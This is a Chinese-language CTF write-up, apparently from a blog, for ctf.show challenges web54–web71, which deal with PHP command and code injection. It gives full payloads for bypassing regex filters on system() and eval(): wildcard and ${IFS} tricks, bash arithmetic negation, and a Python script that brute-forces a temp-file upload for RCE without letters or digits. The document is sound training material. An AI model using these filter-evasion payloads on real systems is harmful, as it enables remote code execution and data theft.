system过滤
web54
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
利用通配符? paload
/?c=rev${IFS}fl?g.php
/?c=/bin/?at${IFS}f???????
data:image/s3,"s3://crabby-images/55b4a/55b4a4927df56d76c8216a630fad21af1ddada58" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/68ae0/68ae0bc3c6d0dff1efbfd3eab617a46763d9c06e" alt="在这里插入图片描述"
web55
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
payload /bin/base64 flag.php
/?c=/???/????64 ????????
还可以用上传临时文件的方法,见下一题
web56
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
无数字字母的rce,上传临时文件,原理:link py脚本:
import requests
url="http://63212fe8-01b7-4867-ab04-458e8e1a39fb.challenge.ctf.show/?c=. /???/????????[@-[]"
files={'file':'ls'}
for i in range(1000):
response=requests.post(url,files=files)
html = response.text
print(html)
data:image/s3,"s3://crabby-images/7c450/7c450c0f4b621792cc24c7d45cb06d9f71561201" alt="在这里插入图片描述"
files={'file':'cat flag.php'}
data:image/s3,"s3://crabby-images/28450/28450c6a3547c119e86f4d2b74b8a6308c016a55" alt="在这里插入图片描述"
web57
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
payload
/?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
https://blog.csdn.net/qq_46091464/article/details/108563368 data:image/s3,"s3://crabby-images/7faf2/7faf2bed4fa5dc011a95773675f4afdd0b92d1da" alt="在这里插入图片描述"
原理是: ${_}="" $((${_}))=0 $((~$((${_}))))=-1 然后拼接出-36在进行取反
注意的是:${_}会输出上一次的执行结果
data:image/s3,"s3://crabby-images/0b5dc/0b5dc9070ad5455e610192dbe87e277dcf99348c" alt="在这里插入图片描述"
disabled function绕过
web58
<?php
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
c=var_dump(scandir('.'));
c=var_dump(file_get_contents('flag.php'));
data:image/s3,"s3://crabby-images/5b8aa/5b8aac543cdbdd8eb8ebe90624eed227486cd00a" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/0a08f/0a08f0243fdb0ef983376f4ea8fd114731b46a94" alt="在这里插入图片描述"
web59
<?php
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
payload
c=var_dump(scandir('.'));
c=highlight_file('flag.php');
data:image/s3,"s3://crabby-images/74f33/74f33cd1702895aa1077345240759bccd550559c" alt="在这里插入图片描述"
web60
<?php
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
payload同上 data:image/s3,"s3://crabby-images/68197/68197d5a69deac77713e07c78229b0374211b182" alt="在这里插入图片描述"
web61
data:image/s3,"s3://crabby-images/58975/58975be466e41fa9969d233f4d745465d0c2931d" alt="在这里插入图片描述"
web62
data:image/s3,"s3://crabby-images/4f763/4f763ae0831dcac5d71729278bac4646574e6773" alt="在这里插入图片描述"
web63
data:image/s3,"s3://crabby-images/8b0db/8b0db37f5dbc58e1aaebecf2b557e6b080c68a1b" alt="在这里插入图片描述"
web64
data:image/s3,"s3://crabby-images/7a067/7a06791ef0fbe52d9d1e193fd2f2479df0034dfe" alt="在这里插入图片描述" 绷不住了
web65
data:image/s3,"s3://crabby-images/d1a46/d1a46318690567217805b832108395d4d41dc951" alt="在这里插入图片描述"
wbe66
<?php
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
payload
c=var_dump(scandir('/'));
c=highlight_file('/flag.txt');
data:image/s3,"s3://crabby-images/3f899/3f8995608db541bf30eebd409b32c84b563e27b5" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/20c70/20c7060720c0d582cd770f857a3ab7480acb899b" alt="在这里插入图片描述"
web67
data:image/s3,"s3://crabby-images/04324/04324eb0e4a585b695cb37f089abdb631c74166f" alt="在这里插入图片描述"
web68
笑死我了,源码都不给了 data:image/s3,"s3://crabby-images/bc547/bc5472aa17af329ea4aa1dedff675467a1241970" alt="在这里插入图片描述" 还可以包含读
c=include('/flag.txt');
data:image/s3,"s3://crabby-images/0a8c7/0a8c7fff08bfefa82ffee2f7b7c1f78785c47d84" alt="在这里插入图片描述"
web69
data:image/s3,"s3://crabby-images/37472/374720b3185524e8d6e17be5bd65271afb6c5fcf" alt="在这里插入图片描述"
web70
data:image/s3,"s3://crabby-images/04409/044092aa456e931553072706c28873d1986a069e" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/ca775/ca775daaeed17b78f022d2f9210fdb1cf4401b98" alt="在这里插入图片描述"
web71
<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}
?>
你要上天吗?
执行php代码让后面的匹配缓冲区不执行直接退出 payload:
c=include('/flag.txt');exit();
data:image/s3,"s3://crabby-images/661e3/661e340d757e95238af0b3d27f417d981efc9b2d" alt="在这里插入图片描述"
|